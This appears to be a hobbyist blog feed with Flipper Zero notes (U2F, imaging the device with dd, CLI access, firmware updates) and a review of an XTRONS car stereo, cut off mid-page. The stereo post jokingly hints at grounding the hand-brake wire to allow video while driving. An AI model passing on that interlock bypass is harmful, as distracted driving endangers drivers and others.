tag:blogger.com,1999:blog-91733053221667843432024-03-13T03:49:10.229-07:00WrightrocketAndroid, Cyber-security, Electronics, Linux, macOS, Perl, Photography, Python, Raspberry Pi, UNIX, Windows and other geek topicsWrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.comBlogger180125tag:blogger.com,1999:blog-9173305322166784343.post-90918455476985806772024-02-19T03:18:00.000-08:002024-02-19T03:18:32.350-08:00F0 - U2F<p> The FlipperZero (F0) does offer an important feature which can enhance the owner's security. Instead of relying solely on a phone for a second factor of authentication, you can use the Universal Second Factor (U2F) implemented on the F0.</p><h3 style="text-align: left;">What is U2F?</h3><p><a href="https://en.wikipedia.org/wiki/Universal_2nd_Factor">https://en.wikipedia.org/wiki/Universal_2nd_Factor</a></p><h3 style="text-align: left;">Who Supports U2F?</h3><div>Facebook, Google, YouTube, X, etc.</div><h3 style="text-align: left;">What Documentation is Provided?</h3><div><a href="https://docs.flipper.net/u2f">https://docs.flipper.net/u2f</a></div><div><br /></div><div>https://help.twitter.com/en/managing-your-account/two-factor-authentication</div><div><br /></div><div><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-87595210128081762862024-02-02T23:35:00.000-08:002024-02-02T23:35:33.952-08:00F0 - USB Mass Storage<p>On Flipper</p><p><span> Start USB MassStorage App</span></p><p><span> To begin create a new image which is a copy of the data on your Flipper</span></p><p><span> Select the image</span></p><p><span> The image will be shared</span></p><p><br /></p><p>On Linux</p><p><span> Open two terminal windows/tabs.</span></p><p> Leaving running the command <b>dmesg --follow</b></p><p><span> Connect the Flipper Zero</span></p><p>Output similar to below should should be shown in your terminal running <b>dmesg</b> or type the <b>dmesg </b>command to compare. The highlighted line shows when the USB Mass Storage was enabled and detected on the Linux platform :</p>
<pre>[ 3232.813608] usb 1-5: new full-speed USB device number 6 using xhci_hcd
[ 3233.197273] usb 1-5: New USB device found, idVendor=0483, idProduct=5720, bcdDevice= 1.00
[ 3233.197286] usb 1-5: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 3233.197292] usb 1-5: Product: P3nny
[ 3233.197297] usb 1-5: Manufacturer: Flipper Devices Inc.
[ 3233.197301] usb 1-5: SerialNumber: F0
[ 3233.725621] usb-storage 1-5:1.0: <span style="background-color: #fcff01;">USB Mass Storage device detected</span>
[ 3233.726113] scsi host9: usb-storage 1-5:1.0
[ 3233.726338] usbcore: registered new interface driver usb-storage
[ 3233.938632] usbcore: registered new interface driver uas
[ 3234.767996] scsi 9:0:0:0: Direct-Access Flipper Mass Storage 0001 PQ: 0 ANSI: 4
[ 3234.768830] sd 9:0:0:0: Attached scsi generic sg2 type 0
[ 3234.769407] sd 9:0:0:0: [sdc] 8192 512-byte logical blocks: (4.19 MB/4.00 MiB)
[ 3234.772387] sd 9:0:0:0: [sdc] Write Protect is off
[ 3234.772395] sd 9:0:0:0: [sdc] Mode Sense: 03 00 00 00
[ 3234.775384] sd 9:0:0:0: [sdc] No Caching mode page found
[ 3234.775392] sd 9:0:0:0: [sdc] Assuming drive cache: write through
[ 3234.821872] sd 9:0:0:0: [sdc] Attached SCSI removable disk
</pre><pre><br /></pre><pre>To transfer the file the following happened</pre><pre>keith@fedora:~$ ls -l /dev/sdc
brw-rw----. 1 root disk 8, 32 Jan 31 00:30 /dev/sdc
keith@fedora:~$ id
uid=1000(keith) gid=1000(keith) groups=1000(keith),10(wheel),18(dialout) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
keith@fedora:~$ sudo file /dev/sdc
/dev/sdc: block special (8/32)
keith@fedora:~$ sudo dd status=progress if=/dev/sdc of=F0.img
3916800 bytes (3.9 MB, 3.7 MiB) copied, 29 s, 136 kB/s
8192+0 records in
8192+0 records out
4194304 bytes (4.2 MB, 4.0 MiB) copied, 28.8849 s, 145 kB/s
</pre><div><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-63674029442728191312024-02-02T23:17:00.000-08:002024-02-02T23:17:46.608-08:00F0 - Command Line Interface (CLI)<p><a href=" https://docs.flipper.net/development/cli" target="_blank"> https://docs.flipper.net/development/cli</a> </p><p><a href="https://lab.flipper.net/cli">https://lab.flipper.net/cli</a></p><p><br /></p><p>minicom -s</p><p>Change Serial Port Settings</p><p>Set the device to /dev/ttyACM0</p><p>Set the speed to 203400</p><p>minicom connects to Flipper CLI</p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-51751865266161205272024-02-02T23:11:00.000-08:002024-02-02T23:16:52.330-08:00F0 - Updating Firmware<h2 style="text-align: left;"> The Site</h2><p><a href="https://flipperzero.one/"><span style="color: #e69138;">https://flipperzero.one/</span></a></p><h3 style="text-align: left;"><span face="Roboto, Arial, sans-serif" style="background-color: white;">Shop</span></h3><p><span face="Roboto, Arial, sans-serif" style="background-color: white;"><span face="Roboto, Arial, sans-serif" style="color: #ffa400;"><a href="https://shop.flipperzero.one/">https://shop.flipperzero.one/</a></span></span></p><h3 style="text-align: left;"><span face="Roboto, Arial, sans-serif" style="background-color: white;">Docs</span></h3><p><span style="background-color: white;"><a href="https://docs.flipper.net/"><span style="color: #e69138;">https://docs.flipper.net/</span></a></span></p><h3 style="text-align: left;"><span style="text-wrap: nowrap;">Downloads</span></h3><p><a class="t-menu__link-item" data-menu-item-number="5" data-menu-submenu-hook="" href="https://flipperzero.one/downloads" style="border: 0px; box-sizing: content-box; color: #e88004; font-family: "IBM Plex Sans"; font-size: 16px; margin: 0px; outline: none; padding: 0px; text-decoration-line: none; text-wrap: nowrap; transition: color 0.3s ease-in-out 0s, opacity 0.3s ease-in-out 0s;">https://flipperzero.one/downloads</a></p><h3 style="text-align: left;">Community</h3><div><a class="t-menu__link-item" data-menu-item-number="5" data-menu-submenu-hook="" href="https://flipperzero.one/community" style="border: 0px; box-sizing: content-box; color: #e88004; font-family: "IBM Plex Sans"; font-size: 16px; margin: 0px; outline: none; padding: 0px; text-decoration-line: none; text-wrap: nowrap; transition: color 0.3s ease-in-out 0s, opacity 0.3s ease-in-out 0s;">https://flipperzero.one/community</a></div><div><span face="IBM Plex Sans, Arial, sans-serif"><div class="t228__rightside" style="border: 0px; box-sizing: content-box; display: table-cell; margin: 0px; padding: 0px; text-align: right; vertical-align: middle;"><br /></div></span><div></div><div><div class="t228__rightside" style="border: 0px; box-sizing: content-box; display: table-cell; margin: 0px; padding: 0px; text-align: right; vertical-align: middle;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><h4 style="text-align: left;">Meet Pidipen - Your new Pet Dolphin!</h4><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">This will allow you to update the firmware on the device the easiest way from your computer.</div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><a href="https://flipperzero.one/update"><span style="color: #e69138;">https://flipperzero.one/update</span></a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">or you can install on your mobile phone the Flipper app to connect to your device with Bluetooth that might have to be enabled.</div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><h3 style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px; text-align: left;">qFlipper</h3></div></div></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b><br /></b></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b>git clone https://github.com/flipperdevices/qFlipper</b></div></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b><br /></b></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">Compiling the source code for qFlipper is very challenging because of QT, so I recommend downloading the qFlipper.AppImg, if you are using Linux, currently, buthte version number 1.3.3 is likely to change: <a href="https://update.flipperzero.one/builds/qFlipper/1.3.3/qFlipper-x86_64-1.3.3.AppImage">https://update.flipperzero.one/builds/qFlipper/1.3.3/qFlipper-x86_64-1.3.3.AppImage</a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b><br /></b></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b>chmod u+x qFlipper*.AppImage </b></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b>./qFlipper*.AppImage</b></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><b><br /></b></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">With qFlipper, you can Update the installed firmware and even choose between released, release-candidate, and development branches. Those branches could be called stable, semi-stable, and unstable or works almost always, works most of the time, and might not work, respectively. Most of the time I think it means fewest features, more features and the most features. So, as you exhaust all the menu items of one release, you might try out another. </div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">If you get really adventurous, then you might even try out unofficial firmware, which provide other features and interface. qFlipper will allow you to install firmware released from these alternative firmware developers from a compressed file, but beware there are some serious risks in doing so.</div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">Some examples include:</div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><a href="https://github.com/UberGuidoZ/Flipper">https://github.com/UberGuidoZ/Flipper</a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"> </div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><a href="https://github.com/DarkFlippers/unleashed-firmware">https://github.com/DarkFlippers/unleashed-firmware</a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><a href="https://github.com/wrightrocket/Xtreme-Firmware">https://github.com/wrightrocket/Xtreme-Firmware</a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;">You could even fork the official GitHub flipperzero-firmware and create your own customized firmware.</div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><a href="https://github.com/flipperdevices/flipperzero-firmware">https://github.com/flipperdevices/flipperzero-firmware</a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><h3 style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px; text-align: left;">Details</h3><div>I'm just starting to gather some details about the FlipperZero. To start with the microcontroller that is used in it is found here:</div><div><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><a href="https://www.st.com/en/microcontrollers-microprocessors/stm32wb55rg.html">https://www.st.com/en/microcontrollers-microprocessors/stm32wb55rg.html</a></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div><div class="r t-rec t-rec_pt_0 t-rec_pt-res-480_15 t-rec_pb_0 t-rec_pb-res-480_15" data-animationappear="off" data-bg-color="#ffffff" data-record-type="396" id="rec443847269" style="background-color: white; border: 0px; box-sizing: content-box; margin: 0px; padding: 0px;"><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-74540849418438462272024-02-02T01:04:00.000-08:002024-03-02T02:12:11.665-08:00XTRONS Android Car Stereo Head Android 12 Octa Core 4Gb RAM + 64 GB ROM 8.8 Inch IPS Touch Screen <p style="text-align: center;"><a href="https://youtu.be/8SBhFX0PcLY">https://youtu.be/8SBhFX0PcLY</a></p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/8SBhFX0PcLY" width="320" youtube-src-id="8SBhFX0PcLY"></iframe></div><br /><p><br /></p><p>This blog entry is based on my experience in January 2024, installing and using an XTRONS unit in my wife's <a href="https://wrightrocket.blogspot.com/2024/01/audi-a3-20-tfsi-8p-sportback-premium.html" target="_blank">2012 Audi A3</a> we bought at the end of December 2023.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv7v5MK79FDeqsGKxaGvL9_Va3HDsdq-iXbfKjkIKs8Pq3aEZgtKW2GXyW3RylyVfK0okFwRMFjv1bqwIdbqMfOGHz1FpcwLgFISrrkaIDOA8YrZsfwYecBM1dOE2gPbmjJEHq3GKodThGXmAKnFhJ7w5X9NsRUn4B6XFUqH98eOYnt_YpJ70gNn1kGBZL/s2856/20240201_212820.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1351" data-original-width="2856" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv7v5MK79FDeqsGKxaGvL9_Va3HDsdq-iXbfKjkIKs8Pq3aEZgtKW2GXyW3RylyVfK0okFwRMFjv1bqwIdbqMfOGHz1FpcwLgFISrrkaIDOA8YrZsfwYecBM1dOE2gPbmjJEHq3GKodThGXmAKnFhJ7w5X9NsRUn4B6XFUqH98eOYnt_YpJ70gNn1kGBZL/s320/20240201_212820.jpg" width="320" /></a></div><br /><p><br /></p><p>It was advertised on Amazon at the time for $329.89 with free delivery in less than a week. The unit was delivered in two days. It was described as:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><b>XTRONS Car Stereo for Audi A3 S3 RS3, Android 12 Octa Core 4GB+64GB Car Radio, 8.8 Inch IPS Touch Screen GPS Navigation for Car Bluetooth Head Unit, Built-in DSP Car Play Android Auto Support 4G LTE</b></p></blockquote><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwhU4nMwMdXYAe_J8lO2rmSI4-dr3WEqZby1-5JScYoGlB6a6r2KKWWasLVeirrG5lAlfvfvDM0G527vHhdON7eV8IMhCkbhyxcE7W07qjZMuBl4OEO_FPvy5vP_qSFgCxWBplxObAudsmQUojVLg6bOk-e21zqhtK-KfbdA-t_4mRNN8V7fQvTEZnUmlN/s1000/61Ryvap+I0L._AC_SL1000_.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1000" data-original-width="1000" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwhU4nMwMdXYAe_J8lO2rmSI4-dr3WEqZby1-5JScYoGlB6a6r2KKWWasLVeirrG5lAlfvfvDM0G527vHhdON7eV8IMhCkbhyxcE7W07qjZMuBl4OEO_FPvy5vP_qSFgCxWBplxObAudsmQUojVLg6bOk-e21zqhtK-KfbdA-t_4mRNN8V7fQvTEZnUmlN/s320/61Ryvap+I0L._AC_SL1000_.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB0YHT_JdME_QdsBx-7xmL_6ocUtKX8BNVHpQXWHkVovxcYNVjORs_UGjMRwmuHqFszv4YxsnrSCKkgSspa45DI45sQquLHyFisX5BU5eAEsz_ZVKFODNxLnIS1wbsWFSQFNDx8x2F9zsxFGIlMd3owBrJo-3SFq4S6_x5gAZs5jEHm754jeWkoflicxZI/s1464/71FJOAQpzFL._AC_SL1500_.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1210" data-original-width="1464" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB0YHT_JdME_QdsBx-7xmL_6ocUtKX8BNVHpQXWHkVovxcYNVjORs_UGjMRwmuHqFszv4YxsnrSCKkgSspa45DI45sQquLHyFisX5BU5eAEsz_ZVKFODNxLnIS1wbsWFSQFNDx8x2F9zsxFGIlMd3owBrJo-3SFq4S6_x5gAZs5jEHm754jeWkoflicxZI/s320/71FJOAQpzFL._AC_SL1500_.jpg" width="320" /></a></div><br /><p> </p><p>Aside from a few Audi models XTRONS claims to support with this unit, I know it's a perfect fit for mine. They make head units for dozens of car makes including units with HVAC controls. They have overhead and head rest units and tons of accessories at reasonable prices for the quality. Check them out: <a href="https://xtrons.com/">https://xtrons.com/</a> or add to the make of your vehicle like <a href="https://xtrons.com/ford">https://xtrons.com/ford</a> to see what they have for you.</p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm1zB32mx30HIz9Xzy4NCrTCXO8MsB4b9O8T0L-ul8d-nNgIPKYm23V8VsveHg14JgaD7eiE0d2T5Ut7RPidL2dmC6Avml37JrGnIIf-yR6YYmrMAwz817oYU_giLS-K9cglrWvRP_lXBQQYJHVURH439WON80nS7N5sWpNhs8C6GgpkULuF1KSPIgjvuz/s2992/20240115_193051.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2992" data-original-width="2992" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm1zB32mx30HIz9Xzy4NCrTCXO8MsB4b9O8T0L-ul8d-nNgIPKYm23V8VsveHg14JgaD7eiE0d2T5Ut7RPidL2dmC6Avml37JrGnIIf-yR6YYmrMAwz817oYU_giLS-K9cglrWvRP_lXBQQYJHVURH439WON80nS7N5sWpNhs8C6GgpkULuF1KSPIgjvuz/s320/20240115_193051.jpg" width="320" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><span style="text-align: left;"> I had tried a cheaper EKAT Android Auto (AA) that was so slow with only 2 GB RAM , and fit poorly into the console. The XTRONS units cost more, but they are worth it! This cheap unit would glitch several times a day, and I'd have to keeping turning connections in the car and my phone off and on again to get it to work at all. Update: A source I came across said, XTRONS units are made in China, but they are designed in the U.K.</span></div><div class="separator" style="clear: both; text-align: center;"><span style="text-align: left;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><span style="text-align: left;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/yPXbOeb6d_k" width="320" youtube-src-id="yPXbOeb6d_k"></iframe></div><br /><span style="text-align: left;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><span style="text-align: left;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><span style="text-align: left;">The surely are much better than the stock </span><span style="text-align: left;">AM/FM/XM CD stereo unit radio. The one that was in my wife's Audi when we bought it a week before was in horrible cosmetic condition, although it worked fine. Anyone want it? </span></div><div class="separator" style="clear: both; text-align: center;"><span style="text-align: left;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKZZNhboPU0ICsFZjgOkTERy3jMtFfP15rrPZWkCeuqe_g5ohjkdHFEIQZuouQv58YTGM_f4eN0cxUtmzLKMioGegNLzj0yVzRIUq4pHefqILu7PDmQg1D6WWAulePgVtqIeF0OOJZNRnBvscEmKYsHCJSQWRmorZaTprqAJgYIFCkbguna9IF8TKqeUIr/s2734/20240201_212219.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1575" data-original-width="2734" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKZZNhboPU0ICsFZjgOkTERy3jMtFfP15rrPZWkCeuqe_g5ohjkdHFEIQZuouQv58YTGM_f4eN0cxUtmzLKMioGegNLzj0yVzRIUq4pHefqILu7PDmQg1D6WWAulePgVtqIeF0OOJZNRnBvscEmKYsHCJSQWRmorZaTprqAJgYIFCkbguna9IF8TKqeUIr/s320/20240201_212219.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><h3 style="text-align: left;">XTRONS manual</h3><a href="https://xtrons.com/user-guides/TR100%20&%20TR704L.pdf">https://xtrons.com/user-guides/TR100%20&%20TR704L.pdf</a><br /><p>The XTRONS manual is great at telling you what you need to know! For example, if you don't connect the light blue wire to ground, 😉 I mean the hand brake circuit, then you won't be able to watch videos without the hand brake being set.</p><p>The manual provides clear instructions including graphics and was good enough to get the basic unit working. During installation the only issues I ran into were not having working video playback, or getting input from the backup camera, which I explain how to do that nugget below. </p><p>Some important nuggets that may or may not be in the manual, but I'll give them credit for at least giving the code for bluetooth (and maybe more) for XTRONS uni</p><p>I have also found the code <b>8888</b> is useful if you go into Infotainment settings for Video for picture quality adjusts and About device for many other low-level settings.</p><p>One nugget I had to search for was a way to get the video input to work from a backup camera. When you put the car into reverse, hold press video input to access settings button and then the menu with the code <b>1111</b>. You have to press into the menu to type the code! So, if you see "No Input" on your backup camera or other video input on screen, change input settings for video format and screen resolution using this hack!</p><p>This last one I haven't tried, but I think it came from the manual. Since I can watch YouTube and use Android Auto apps, in addition to the apps available outside, I haven't been too motivated, yet.</p><div data-hveid="CEEQAQ" style="background-color: white; color: #202124; font-family: Roboto, arial, sans-serif;"><div aria-controls="_RG28Za2aHe2dkPIPlYK36AI_64" aria-expanded="true" class="dnXCYb" jsaction="AWEk5c" jsname="tJHJj" role="button" style="align-items: center; box-sizing: border-box; cursor: pointer; display: flex; max-height: none; outline: 0px; position: relative; width: 652px;" tabindex="0"><div class="JlqpRe" jsname="lN6iy" style="flex: 1 1 0%; margin: 12px 0px; overflow: hidden;"><span class="JCzEY ZwRhJd" color="var(--YLNNHc)" jsname="r4nke" style="-webkit-box-orient: vertical; -webkit-line-clamp: unset !important; display: -webkit-box; font-size: 16px; line-height: 18px; overflow: hidden;"><span class="CSkcDe" color="var(--YLNNHc)" face=""Google Sans", Roboto, arial, sans-serif" style="line-height: 24px;">How do I mirror my phone to Xtrons?</span></span></div><div class="aj35ze" jsname="Q8Kwad" style="background-image: url("data:image/svg+xml,<svg focusable=\"false\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 24 24\"><path fill=\"%2370757a\" d=\"M16.59 8.59L12 13.17 7.41 8.59 6 10l6 6 6-6z\"></path></svg>"); display: inline-block; height: 24px; transform: rotateZ(180deg); width: 24px;"></div><div class="L3Ezfd" data-ved="2ahUKEwitzKjS5ouEAxXtDkQIHRXBDS0Quk56BAhBEAI" jsname="pcRaIe" style="height: 48px; left: 0px; position: absolute; top: 0px; visibility: hidden; width: 